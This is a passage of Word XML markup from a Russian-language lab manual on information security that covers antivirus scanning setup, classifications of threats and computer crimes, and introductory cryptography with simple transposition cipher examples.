        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>наиболее общем виде компьютерных преступлений можно классифицировать по способу совершения на следующие основные группы: несанкционированный доступ, вирусная модификация (разработка, использование или распространение компьютерных вирусных программ, которые заведомо приводят к нарушению работы ЭВМ или их сетей, внесению несанкционированных собственником изменений в компьютерную информацию) и перехват информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Рассмотрим практические способы защиты от вредоносных программ. Для поиска и обезвреживания (лечения, удаления) вредоносных программ, блокирующих работу операционной системы, осуществляющих удаление, модификацию, шифрование данных, несанкционированный доступ к конфиденциальный информации и ее передачу (например, троянские программы) существует разнообразное антивирусное программное обеспечение. Для операционной системы Windows могут применяться антивирусные программы</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Kaspersky Antivirus,  Doctor  Web,  NOD,  McAfee  и т.д.,  которые,  как правило,  могут</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="826" w:right="840" w:bottom="494" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="253" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="page10"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>функционировать в автономном (offline) и сетевом режиме (online), что объясняется необходимостью обновления антивирусных баз, нештатным режимом функционирования операционной системы (блокирование доступа пользователя к ресурсам операционной системы, всплывающие окна, ошибки в работе, отказ устройств и т.д.). В наиболее сложных ситуациях при затрудненном пуске операционной системы может потребоваться загрузка антивирусной программы в безопасном режиме, которая позволяет осуществить очистку реестра и ресурсов операционной системы от следов вредоносного кода.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="6" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Помимо проверяемой области (оперативная память, локальный диск, съемный накопитель), типов проверяемых файлов и порядка действий при обнаружении вредоносной программы, как правило, можно выбрать уровень безопасности работы (высокий, рекомендуемый или низкий) в зависимости от уровня квалификации пользователя, а также метод проверки: эвристический анализ – позволяет обнаружить новые модификации кода вредоносного программного обеспечения, которые отсутствуют в базе антивирусной программы с различными уровнями детализации в зависимости от степени тщательности проверки; поиск сигнатур – облегчает нахождение известных угроз безопасности и устранение уязвимостей в установленном программном обеспечении и параметрах операционной системы на основании кодовых записей (сигнатур), содержащихся в базе антивирусной программы; поиск руткитов – обнаружение вредоносных программ, которые скрывают свою активность в операционной системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="4" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="251" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Запустим антивирусную программу McAfee – сканирование по требованию и настроим параметры ее работы. Во вкладке «Объекты сканирования» указать проверяемую область (все локальные диски ), отметить пункты, касающиеся вложенных папок и загрузочных секторов, в разделе «Элементы» – отметить пункты, касающиеся запущенных процессов и руткитов, а также добавить элемент «Зарагистрированные файлы» с помощью кнопки «Добавить». Во вкладке «Сканировать элементы» выбрать типы проверяемых файлов по умолчанию и дополнительные типы (.zip), отметить пункт , касающийся макросов, в разделе «Параметры» – отметить пункт, касающийся архивов, а в разделе «Эвристический анализ» – отметить все пункты. Во вкладке «Производительность» перевести элемент «Использование системы» в состояние «Ниже нормы». Во вкладке «Действия» выбрать в качестве порядка: первое действие – «Вывести запрос », второе действие – «Удалить». Во вкладке «Отчеты» с помощью кнопки «Обзор» создать файл отчета «Фамилия» на рабочем столе. В главном меню антивирусной программы запустить проверку и контролировать результаты работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="267"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вопросы по теме</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pP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Понятие информационной угрозы</w:t>
      </w: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Причины реализации информационных угроз</w:t>
      </w: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Виды реализации угроз информационной безопасности</w:t>
      </w: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Классификация информационных угроз</w:t>
      </w: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Способы воздействия информационных угроз</w:t>
      </w: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Классификация вредоносного программного обеспечения</w:t>
      </w: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Классификация компьютерных преступлений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="206"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задания 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Используя средства Internet (kaspersky.ru и т.п.), справочные средства и антивирусное программное обеспечение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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найти и отобразить с экспортом в Microsoft Word понятия мошеннического программного обеспечения, харкерских атак, фишинга и спама;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1060"/>
        </w:tabs>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:left="1060" w:hanging="354"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>найти и отобразить с экспортом в Microsoft Word описание порядка использования и ключевых функций Kaspersky Unlocker и Kaspersky Internet Security, дать сравнительную характеристику ключевых функций Kaspersky Rescue Disk и Kaspersky Antivirus (Kaspersky Virusscanner, Kaspersky Virus Removal Tool и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="3" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1060"/>
        </w:tabs>
        <w:spacing w:line="248" w:lineRule="auto"/>
        <w:ind w:left="1060" w:hanging="354"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>открыть антивирусную программу, произвести настройку параметров ее работы, запустить проверку и сформировать отчет от результатах работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1060"/>
        </w:tabs>
        <w:spacing w:line="248" w:lineRule="auto"/>
        <w:ind w:left="1060" w:hanging="354"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="829" w:right="840" w:bottom="476" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="page11"/>
      <w:bookmarkStart w:id="11" w:name="_Toc3808612"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:t>4. Методы и средства обеспечения информационной безопасности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="234"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Методические указания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1150"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>методам обеспечения информационной безопасности принято относить препятствие; управление доступом, включая идентификацию и аутентификацию объекта или субъекта, проверку полномочий, регистрацию обращений и реагирование; маскировку, регламентацию, принуждение и побуждение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Эти методы реализуются с помощью следующих основных средств: законодательные, организационные, аппаратные, программные, криптографические и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="700"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>В частности, организационные средства обеспечения информационной безопасности -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>это регламентация производственной деятельности и взаимоотношений исполнителей на нормативно-правовой основе таким образом, что разглашение, утечка и несанкционированный доступ к конфиденциальной информации становятся невозможными или существенно затрудняются за счет проведения организационных мероприятий. Оно включает в себя ряд административных, технических и экономических мероприятий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="4" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>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Криптографический механизм включает следующие основные элементы: шифрование данных, которое может быть симметричным (основывается на использовании одного и того же секретного ключа для шифрования и дешифрования) и асимметричным (для шифрования используется один общедоступный ключ, а для дешифрования - другой, являющийся секретным, при этом знание общедоступного ключа не позволяет определить секретный ключ); цифровая электронная подпись (основываются на алгоритмах ассиметричного шифрования и включают две процедуры: формирование подписи отправителем путем шифрования блока данных с использованием секретного ключа и ее опознавание получателе, основанная на использовании общедоступного ключа); контроль доступа (осуществляют проверку полномочий программ и пользователей на доступ к ресурсам информационной сети.); управление маршрутизацией обеспечение целостности данных (обеспечивается выполнением взаимосвязанных процедур шифрования и дешифрования отправителем и получателем: отправитель дополняет передаваемый блок криптографической суммой, а получатель сравнивает ее с криптографическим значением, соответствующим принятому блоку) и аутентификации и так далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="7" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Продемонстрируем на практике применение криптографических методов обеспечения информационной безопасности. Как известно, коды использовали в глубокой древности для засекречивания какого-либо важного сообщения Геродот, Цезарь, Бэкон и другие. Сегодня при передаче сообщений по линиям связи используются те или иные коды, т.е.</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представление сообщения в виде комбинации элементарных сигналов или символов (например, азбука Морзе).</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Кодированием называется отображение состояния одной физической системы с помощью состояния некоторой другой (например, при телефонном разговоре звуковые сигналы кодируются в виде электромагнитных колебаний, а затем снова декодируются, превращаясь в звуковые сигналы на другом конце линии).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="700"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Криптология (от греч. kryptos – тайный, logos – наука) разделяется на два направления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>– криптографию и криптоанализ. Криптография (от греч. grafos – письмо) – наука о защите информации от несанкционированного доступа. Сфера интересов криптоанализа противоположная – разработка и исследование методов дешифрования (раскрытия) шифрограммы даже без знания секретного ключа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Под шифрованием понимается такое преобразование информации, которое делает исходные данные нечитаемыми и трудно раскрываемыми без знания ключа, т.е. специальной секретной информации, определяющей, какое преобразование из множества возможных шифрующих преобразований выполняется в конкретном случае над открытым текстом.</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По характеру использования ключа алгоритмы шифрования делятся на два типа: симметричные (с одним секретным ключом) и несимметричные (с открытым и закрытым ключами или с одним открытым ключом).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="269" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Множество современных методов шифрования можно разделить на четыре большие группы: метод подстановки – позиции символов в шифрованном сообщении остаются теми</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="page12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>же, что и у исходного открытого сообщения, однако символы заменяются символами из другого или этого же алфавита (например, в квадрате Полибия буквы заменяются соответствующими цифрами); метод перестановок – все символы исходного открытого сообщения остаются без изменений, но меняются местами по определенному закону с использованием определенного ключа; аддитивные методы – порядковые номера (коды) символов исходного сообщения увеличиваются (уменьшаются) на величину каждого из символов (кодов) последовательности, которая называется гаммой шифра; аналитическое преобразование – производится преобразование структурных блоков исходного сообщения в соответствии с определенным алгоритмом; комбинированные методы – сочетание вышеназванных методов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Метод перестановки может реализовываться с помощью матричного алгоритма, который заключается в том, что исходные символы текста помещаются в матрицу слева направо и сверху вниз, а затем производится шифрование путем считывания символов по столбцам матрицы сверху вниз слева направо, при этом количество столбцов и порядок их считывания является ключом шифра; вместо ключа возможно использование ключевого слова, в котором число букв и их алфавитное расположение определяет алгоритм перестановки).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1"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ИЯАЦРМФОИН – ИНФОРМАЦИЯ</w:t>
      </w:r>
    </w:p>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РКПИОТРГФАЯИ – КРИПТОГРАФИЯ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="20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380"/>
        <w:gridCol w:w="500"/>
        <w:gridCol w:w="320"/>
        <w:gridCol w:w="160"/>
        <w:gridCol w:w="480"/>
        <w:gridCol w:w="460"/>
        <w:gridCol w:w="520"/>
        <w:gridCol w:w="460"/>
        <w:gridCol w:w="920"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="338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50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О</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="320" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom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Т</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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48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О</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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Б</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="52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Р</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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А</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="92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0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="338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5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Ж</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="320" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom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Е</w:t>
            </w:r>
